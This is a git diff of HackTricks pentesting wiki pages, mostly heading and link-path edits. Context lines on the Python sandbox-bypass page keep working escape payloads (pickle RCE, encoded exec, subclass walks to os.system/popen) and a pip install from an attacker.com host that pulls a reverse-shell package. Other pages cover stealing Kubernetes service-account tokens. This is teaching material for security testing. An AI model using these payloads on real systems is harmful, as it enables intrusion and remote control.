 </details>
 
-
 In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
 
 Here are some techniques you can try to escape to a different namespace:
 
-## Abuse K8s privileges
+### Abuse K8s privileges
 
 Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
 
@@ -31,7 +30,7 @@ For more info about which privileges you can abuse read:
 [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
 {% endcontent-ref %}
 
-## Escape to the node
+### Escape to the node
 
 If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
 
@@ -41,12 +40,10 @@ If you can escape to the node either because you have compromised a pod and you
 
 All these techniques are explained in:
 
-{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
+{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
 {% endcontent-ref %}
 
-
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -62,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

generic-methodologies-and-resources/pentesting-methodology.md

@@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 ### 0- Physical Attacks
 
-Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/).
+Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications/).
 
 ### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
 
@@ -146,9 +146,9 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
 
 #### **Exploiting**
 
-* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
-* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
-* [**Basic exploiting tools**](../exploiting/tools/)
+* [**Basic Linux Exploiting**](../group-1/linux-exploiting-basic-esp/)
+* [**Basic Windows Exploiting**](../group-1/windows-exploiting-basic-guide-oscp-lvl.md)
+* [**Basic exploiting tools**](../group-1/tools/)
 
 #### [**Basic Python**](../misc/basic-python/)
 

group-1/reversing-and-exploiting.md

@@ -0,0 +1,2 @@
+# Reversing & Exploiting
+

group-1/reversing-tools-basic-methods/README.md

@@ -1,5 +1,7 @@
 # Reversing Tools & Basic Methods
 
+## Reversing Tools & Basic Methods
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Wasm decompiler / Wat compiler
+## Wasm decompiler / Wat compiler
 
 Online:
 
@@ -30,14 +31,14 @@ Software:
 * [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
 * [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
 
-# .Net decompiler
+## .Net decompiler
 
 [https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\
 [ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\
 If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\
 You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)
 
-## DNSpy Logging
+### DNSpy Logging
 
 In order to make **DNSpy log some information in a file**, you could use this .Net lines:
 
@@ -47,7 +48,7 @@ path = "C:\\inetpub\\temp\\MyTest2.txt";
 File.AppendAllText(path, "Password: " + password + "\n");
 ```
 
-## DNSpy Debugging
+### DNSpy Debugging
 
 In order to debug code using DNSpy you need to:
 
@@ -108,14 +109,14 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
 
 ![](<../../.gitbook/assets/image (285).png>)
 
-# Java decompiler
+## Java decompiler
 
 [https://github.com/skylot/jadx](https://github.com/skylot/jadx)\
 [https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
 
-# Debugging DLLs
+## Debugging DLLs
 
-## Using IDA
+### Using IDA
 
 * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
 * Select **Windbg** debugger
@@ -131,7 +132,7 @@ Then, when you start debugging **the execution will be stopped when each DLL is
 
 But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
 
-## Using x64dbg/x32dbg
+### Using x64dbg/x32dbg
 
 * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
 * **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
@@ -144,7 +145,7 @@ Notice that when the execution is stopped by any reason in win64dbg you can see
 
 Then, looking to this ca see when the execution was stopped in the dll you want to debug.
 
-# GUI Apps / Videogames
+## GUI Apps / Videogames
 
 [**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in:
 
@@ -152,13 +153,13 @@ Then, looking to this ca see when the execution was stopped in the dll you want
 [cheat-engine.md](cheat-engine.md)
 {% endcontent-ref %}
 
-# ARM & MIPS
+## ARM & MIPS
 
 {% embed url="https://github.com/nongiach/arm_now" %}
 
-# Shellcodes
+## Shellcodes
 
-## Debugging a shellcode with blobrunner
+### Debugging a shellcode with blobrunner
 
 [**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\
 Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode.
@@ -170,7 +171,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
 [blobrunner.md](blobrunner.md)
 {% endcontent-ref %}
 
-## Debugging a shellcode with jmp2it
+### Debugging a shellcode with jmp2it
 
 [**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
 
@@ -178,7 +179,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
 
 You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
 
-## Debugging shellcode using Cutter
+### Debugging shellcode using Cutter
 
 [**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically.
 
@@ -196,7 +197,7 @@ You can see the stack for example inside a hex dump:
 
 ![](<../../.gitbook/assets/image (402).png>)
 
-## Deobfuscating shellcode and getting executed functions
+### Deobfuscating shellcode and getting executed functions
 
 You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
 It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
@@ -216,11 +217,11 @@ scDbg also counts with a graphical launcher where you can select the options you
 
 The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
 
-## Disassembling using CyberChef
+### Disassembling using CyberChef
 
 Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
 
-# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
+## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
 
 This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works:
 
@@ -238,7 +239,7 @@ And [install keystone](https://github.com/keystone-engine/keystone/blob/master/d
 
 If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
 
-# Rust
+## Rust
 
 To find the **entry point** search the functions by `::main` like in:
 
@@ -247,7 +248,7 @@ To find the **entry point** search the functions by `::main` like in:
 In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
 Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
 
-# **Delphi**
+## **Delphi**
 
 For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
 
@@ -259,7 +260,7 @@ This plugin will execute the binary and resolve function names dynamically at th
 
 It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom.
 
-# Golang
+## Golang
 
 I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
 
@@ -267,15 +268,15 @@ Just press **ATL+f7** (import python plugin in IDA) and select the python plugin
 
 This will resolve the names of the functions.
 
-# Compiled Python
+## Compiled Python
 
 In this page you can find how to get the python code from an ELF/EXE python compiled binary:
 
-{% content-ref url="../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
-[.pyc.md](../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
+[.pyc.md](../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
 {% endcontent-ref %}
 
-# GBA - Game Body Advance
+## GBA - Game Body Advance
 
 If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it:
 
@@ -388,11 +389,11 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
 
 **Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
 
-# Game Boy
+## Game Boy
 
 {% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
 
-# Courses
+## Courses
 
 * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
 * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)

hardware-physical-access/firmware-analysis/README.md

@@ -1,4 +1,4 @@
-
+# Firmware Analysis
 
 <details>
 
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Introduction
+## Introduction
 
 Firmware is a type of software that provides communication and control over a device’s hardware components. It’s the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware.
 
@@ -25,7 +24,7 @@ Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash m
 
 It’s important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process.
 
-# **Information gathering and reconnaissance**
+## **Information gathering and reconnaissance**
 
 During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following:
 
@@ -47,7 +46,7 @@ During this stage, collect as much information about the target as possible to u
 
 Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore).
 
-# Getting the Firmware
+## Getting the Firmware
 
 There are different ways with different difficulty levels to download the firmware
 
@@ -66,7 +65,7 @@ There are different ways with different difficulty levels to download the firmwa
 * Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT).
   * You will need a supported chip programmer for flash storage and/or the MCU.
 
-# Analyzing the firmware
+## Analyzing the firmware
 
 Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that:
 
@@ -83,18 +82,18 @@ If you don't find much with those tools check the **entropy** of the image with
 
 Moreover, you can use these tools to extract **files embedded inside the firmware**:
 
-{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
-[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
+{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
+[file-data-carving-recovery-tools.md](../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
 {% endcontent-ref %}
 
 Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
 
-## Getting the Filesystem
+### Getting the Filesystem
 
 With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\
 Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
 
-### Manual Filesystem Extraction
+#### Manual Filesystem Extraction
 
 Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below.
 
@@ -146,7 +145,7 @@ Files will be in "`squashfs-root`" directory afterwards.
 
 `$ ubidump.py <bin>`
 
-## Analyzing the Filesystem
+### Analyzing the Filesystem
 
 Now that you have the filesystem is time to start looking for bad practices such as:
 
@@ -199,7 +198,7 @@ Inside the filesystem you can also find **source code** of programs (that you sh
 Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity).
 {% endhint %}
 
-# Emulating Firmware
+## Emulating Firmware
 
 The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**.
 
@@ -207,11 +206,11 @@ The idea to emulate the Firmware is to be able to perform a **dynamic analysis**
 At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target.
 {% endhint %}
 
-## Binary Emulation
+### Binary Emulation
 
 If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled.
 
-### MIPS example
+#### MIPS example
 
 ```bash
 file ./squashfs-root/bin/busybox
@@ -231,7 +230,7 @@ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls
 100              100.7z           15A6D2.squashfs  squashfs-root    squashfs-root-0
 ```
 
-### ARM Example
+#### ARM Example
 
 ```bash
 file bin/busybox                
@@ -245,7 +244,7 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
 1C00000.squashfs  B80B6C            C41DD6.xz         squashfs-root     squashfs-root-0
 ```
 
-## Full System Emulation
+### Full System Emulation
 
 There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware:
 
@@ -257,7 +256,7 @@ There are several tools, based in **qemu** in general, that will allow you to em
 * [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)
 * [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool)
 
-# **Dynamic analysis**
+## **Dynamic analysis**
 
 In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**.
 
@@ -283,7 +282,7 @@ You should test if the device is doing any kind of **firmware integrity tests**,
 
 Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications.
 
-# **Runtime analysis**
+## **Runtime analysis**
 
 Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below:
 
@@ -305,7 +304,7 @@ Tools that may be helpful are (non-exhaustive):
 * Binary Ninja
 * Hopper
 
-# **Binary Exploitation**
+## **Binary Exploitation**
 
 After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory.
 
@@ -316,12 +315,12 @@ Utilize the following references for further guidance:
 * [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/)
 * [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
 
-# Prepared OSs to analyze Firmware
+## Prepared OSs to analyze Firmware
 
 * [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded.
 * [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools.
 
-# Vulnerable firmware to practice
+## Vulnerable firmware to practice
 
 To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point.
 
@@ -338,16 +337,15 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl
 * Damn Vulnerable IoT Device (DVID)
   * [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
 
-# References
+## References
 
 * [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
 * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
 
-# Trainning and Cert
+## Trainning and Cert
 
 * [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
 
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -363,5 +361,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

misc/basic-python/bypass-python-sandboxes/README.md

@@ -1,4 +1,4 @@
-
+# Bypass Python sandboxes
 
 <details>
 
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
 These are some tricks to bypass python sandbox protections and execute arbitrary commands.
 
-# Command Execution Libraries
+## Command Execution Libraries
 
 The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
 
@@ -66,9 +65,9 @@ Python try to **load libraries from the current directory first** (the following
 
 ![](<../../../.gitbook/assets/image (552).png>)
 
-# Bypass pickle sandbox with default installed python packages
+## Bypass pickle sandbox with default installed python packages
 
-## Default packages
+### Default packages
 
 You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
 Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
@@ -89,7 +88,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0)))
 
 For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
 
-## Pip package
+### Pip package
 
 Trick shared by **@isHaacK**
 
@@ -102,13 +101,13 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
 
 You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
 
-{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
+{% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
 
 {% hint style="info" %}
 This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
 {% endhint %}
 
-# Eval-ing python code
+## Eval-ing python code
 
 This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
 
@@ -133,7 +132,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
 exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
 ```
 
-# Builtins
+## Builtins
 
 * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
 * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
@@ -145,7 +144,7 @@ __builtins__.__import__("os").system("ls")
 __builtins__.__dict__['__import__']("os").system("ls")
 ```
 
-## No Builtins
+### No Builtins
 
 When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
 However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
@@ -175,7 +174,7 @@ import __builtin__
 get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
 ```
 
-### Python3
+#### Python3
 
 ```python
 # Obtain builtins from a globally defined function
@@ -194,7 +193,7 @@ get_flag.__globals__['__builtins__']
 
 [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
 
-### Python2 and Python3
+#### Python2 and Python3
 
 ```python
 # Recover __builtins__ and make eveything easier
@@ -202,7 +201,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__
 __builtins__["__import__"]('os').system('ls')
 ```
 
-## Builtins payloads
+### Builtins payloads
 
 ```python
 # Possible payloads once you have found the builtins
@@ -212,7 +211,7 @@ __builtins__["__import__"]('os').system('ls')
 # See them below
 ```
 
-# Globals and locals
+## Globals and locals
 
 Checking the **`globals`** and **`locals`** is a good way to know what you can access.
 
@@ -242,11 +241,11 @@ class_obj.__init__.__globals__
 
 [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
 
-# Discover Arbitrary Execution
+## Discover Arbitrary Execution
 
 Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
 
-### Accessing subclasses with bypasses
+#### Accessing subclasses with bypasses
 
 One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**:
 
@@ -275,7 +274,7 @@ defined_func.__class__.__base__.__subclasses__()
 (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
 ```
 
-## Finding dangerous libraries loaded
+### Finding dangerous libraries loaded
 
 For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**:
 
@@ -383,7 +382,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
 """
 ```
 
-# Recursive Search of Builtins, Globals...
+## Recursive Search of Builtins, Globals...
 
 {% hint style="warning" %}
 This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.**
@@ -511,7 +510,7 @@ You can check the output of this script in this page:
 [output-searching-python-internals.md](output-searching-python-internals.md)
 {% endcontent-ref %}
 
-# Python Format String
+## Python Format String
 
 If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
 
@@ -566,7 +565,7 @@ class HAL9000(object):
 
 **More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)
 
-## Sensitive Information Disclosure Payloads
+### Sensitive Information Disclosure Payloads
 
 ```python
 {whoami.__class__.__dict__}
@@ -579,7 +578,7 @@ class HAL9000(object):
 {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
 ```
 
-# Dissecting Python Objects
+## Dissecting Python Objects
 
 {% hint style="info" %}
 If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
@@ -600,7 +599,7 @@ def get_flag(some_input):
         return "Nope"
 ```
 
-### dir
+#### dir
 
 ```python
 dir() #General dir() to find what we have loaded
@@ -609,7 +608,7 @@ dir(get_flag) #Get info tof the function
 ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
 ```
 
-### globals
+#### globals
 
 `__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
 
@@ -624,7 +623,7 @@ CustomClassObject.__class__.__init__.__globals__
 
 [**See here more places to obtain globals**](./#globals-and-locals)
 
-## **Accessing the function code**
+### **Accessing the function code**
 
 **`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function.
 
@@ -642,7 +641,7 @@ dir(get_flag.__code__)
 ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
 ```
 
-## Getting Code Information
+### Getting Code Information
 
 ```python
 # Another example
@@ -690,7 +689,7 @@ get_flag.__code__.co_code
 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
 ```
 
-## **Disassembly a function**
+### **Disassembly a function**
 
 ```python
 import dis
@@ -744,7 +743,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
          47 RETURN_VALUE
 ```
 
-# Compiling Python
+## Compiling Python
 
 Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
 Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
@@ -762,7 +761,7 @@ def get_flag(some_input):
         return "Nope"
 ```
 
-## Creating the code object
+### Creating the code object
 
 First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked:
 
@@ -795,7 +794,7 @@ types.CodeType.__doc__
 ```
 {% endhint %}
 
-## Recreating a leaked function
+### Recreating a leaked function
 
 {% hint style="warning" %}
 In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
@@ -812,7 +811,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
 #ThisIsTheFlag
 ```
 
-## Bypass Defenses
+### Bypass Defenses
 
 In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\
 Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF).
@@ -856,19 +855,19 @@ f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdi
 f(42)
 ```
 
-# Decompiling Compiled Python
+## Decompiling Compiled Python
 
 Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
 
 **Check out this tutorial**:
 
